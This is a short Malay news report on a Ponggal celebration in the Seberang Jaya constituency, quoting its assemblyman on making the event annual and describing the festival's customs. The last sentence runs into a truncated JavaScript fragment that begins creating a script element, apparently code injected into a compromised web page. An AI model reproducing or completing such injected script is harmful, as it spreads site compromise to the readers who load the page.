Sambutan Ponggal DUN Seberang Jaya sebagai acara tahunan

KEBAHAGIAAN & KEMAKMURAN BERPANJANGAN… Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya, Dr. Afif Bahardin berharap sambutan hari Ponggal di kawasannya akan diteruskan sebagai acara tahunan kelak.

“Malah, saya berharap ia akan diadakan dengan lebih meriah pada tahun-tahun akan datang,” katanya pada Majlis Sambutan Hari Ponggal Kawasan Dewan Undangan Negeri (KADUN) Seberang Jaya di sini baru-baru ini.

Selain masyarakat berketurunan India, sambutan tersebut turut dimeriahkan dengan kehadiran pelbagai lapisan masyarakat lain.

Hadir sama, Ahli Majlis bagi Majlis Perbandaran Seberang Perai (MPSP), Shuhada Abdul Rahim.

Ponggal merupakan perayaan menuai yang disambut selama empat hari pada bulan Thai di dalam kalendar kaum India dan masakan yang disediakan perlu dimasak menggunakan peralatan semulajadi seperti periuk tanah liat, senduk kayu dan kayu api di bawah sinaran matahari.var d=document;var s=d.createElement(‘script’);